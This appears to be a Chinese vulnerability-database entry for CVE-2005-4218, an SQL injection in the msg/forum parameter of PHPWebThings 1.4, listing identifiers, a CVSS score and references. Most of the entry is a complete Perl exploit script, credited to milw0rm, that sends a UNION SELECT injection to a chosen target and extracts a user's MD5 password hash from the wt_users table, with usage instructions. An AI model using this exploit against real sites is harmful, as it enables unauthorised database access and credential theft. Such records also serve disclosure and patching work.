PHPWebThings MSG Parameter SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109255 漏洞类型 SQL注入
发布时间 2005-11-16 更新时间 2005-12-14
CVE编号 CVE-2005-4218 CNNVD-ID CNNVD-200512-292
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/1325
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200512-292
|漏洞详情
PHPWebThings1.4中的forum.php存在SQL注入漏洞,远程攻击者可以通过msg参数执行任意SQL命令。
|漏洞EXP
#!/bin/bin/perl
#-----------------------------------------------------#
#-      SQL injection in phpwebthing v 1.4.4
#-      Founder by Qptan & Exploting by AhLam
#-      www.leZe.Com Only For Geek Hacker's
#-      coded by AhLaM  A.1.M|at|hotmail.com
#-      http://www.lezr.com/vb/showthread.php?t=6557
#-----------------------------------------------------#
use LWP::Simple;

print "\n============================================\n";
print "\n   SQL injection in phpwebthing v 1.4.4    =  ";
print "\n   Founder by Qptan & Exploting by AhLam   =  ";
print "\n   www.leZe.Com Only For Geek Hacker's     =  ";
print "\n   Coded By AhLaM   A.1.M|at|hotmail.com         ";
print "\n============================================\n";

if(!$ARGV[0] or !$ARGV[1]) {
 print "\nUsage:\nperl $0 [host] [User ID] \n\nExample:\nperl $0 http://www.target.com/ 1\n";
 exit(0);
}
$url = "/forum.php?forum=-1%20union%20select%20password,password,null,null%20from%20wt_users%20where%20uid=$ARGV[1]/*";
$page = get($ARGV[0].$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]\n";
$page =~ m/ - (.*?)<\/td>/ && print "[+] MD5 hash of password is: $1\n";
print "[-] Unable to retrieve hash of password\n" if(!$1);

# milw0rm.com [2005-11-16]
|参考资料

来源:MISC
链接:http://rgod.altervista.org/phpwebth14_xpl.html
来源:BID
名称:15465
链接:http://www.securityfocus.com/bid/15465
来源:MILW0RM
名称:1324
链接:http://milw0rm.com/exploits/1324